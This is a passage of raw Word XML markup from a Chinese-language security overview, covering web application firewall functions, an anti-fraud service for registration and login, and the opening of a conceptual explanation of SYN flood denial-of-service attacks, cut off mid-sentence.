        <w:t>则负责描述对具体攻击的规则定义、模式识别、防御策略等功能。处理逻辑比较稳定，规则集合需要不断针对漏洞进行升级，这是一种可扩展的架构设计。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="0089018E" w:rsidP="0089018E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4686816" cy="1794680"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="图片 25" descr="http://www.thebigdata.cn/upload/2014-10/1410311435875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www.thebigdata.cn/upload/2014-10/141031143587525.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId272" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686460" cy="1794544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="0089018E" w:rsidP="0089018E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74A73" w:rsidRPr="00F41A4C" w:rsidRDefault="00B74A73" w:rsidP="0089018E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对非正常请求进行过滤和拦截</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC00FF" w:rsidRPr="00F41A4C" w:rsidRDefault="00BC00FF" w:rsidP="0089018E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="00776C4D" w:rsidP="0089018E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>信息加密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004630A3" w:rsidRPr="00F41A4C" w:rsidRDefault="004630A3" w:rsidP="004630A3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用户行为日志审计</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004630A3" w:rsidRDefault="004630A3" w:rsidP="004630A3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>管理规范花</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04A52" w:rsidRPr="00F41A4C" w:rsidRDefault="00B04A52" w:rsidP="00B04A52">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00895CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反欺诈</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04A52" w:rsidRDefault="00077EDA" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反欺诈是基于阿里大数据风控服务能力，通过领先的行为收集技术和机器学习模型，解决账号、活动、支付等关键业务环节存在的欺诈威胁，降低企业经济损失</w:t>
      </w:r>
      <w:r w:rsidR="00E51AC6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51AC6" w:rsidRDefault="00E51AC6" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>电商、互联网金融、第三方支付</w:t>
      </w:r>
      <w:r w:rsidR="002A0251">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667E13" w:rsidRDefault="00667E13" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过创新的验证技术，极大提高对恶意用户的拦截能力</w:t>
      </w:r>
      <w:r w:rsidR="008A4106">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F43407" w:rsidRDefault="00F43407" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面组件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4106" w:rsidRDefault="008A4106" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE446C">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>面引入JS脚本、或APP端接入SDK，获取行为数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。反欺诈服务通过业务提供的行为数据、结合大数据进行关联分析，从而评估用户当前操作的风险情况</w:t>
      </w:r>
      <w:r w:rsidR="00BE446C">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0042243F" w:rsidRDefault="00BE446C" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">反欺诈场景: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0042243F" w:rsidRDefault="0042243F" w:rsidP="0042243F">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="95"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE446C" w:rsidRDefault="00BE446C" w:rsidP="0042243F">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="95"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="0042243F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：撞裤</w:t>
      </w:r>
      <w:r w:rsidR="00A72092">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/社工库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0042243F" w:rsidRPr="00BE446C" w:rsidRDefault="0042243F" w:rsidP="00B04A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C7E56" w:rsidRPr="00F41A4C" w:rsidRDefault="002C7E56" w:rsidP="002C7E56">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00895CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E807FA" w:rsidRPr="00136986" w:rsidRDefault="00E807FA" w:rsidP="00514CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136986">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00136986" w:rsidRPr="00136986">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00136986">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP/IP,SYN flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00136986">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击与防范</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514CA4" w:rsidRPr="00514CA4" w:rsidRDefault="00514CA4" w:rsidP="00E807FA">
      <w:pPr>
        <w:ind w:firstLine="190"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是当前最流行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（拒绝服务攻击）与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DdoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（分布式拒绝服务攻击）的方式之一，这是一种利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议缺陷，发送大量伪造的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接请求，从而使得被攻击方资源耗尽（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>满负荷或内存不足）的攻击方式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　要明白这种攻击的基本原理，还是要从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接建立的过程开始说起：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　大家都知道，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
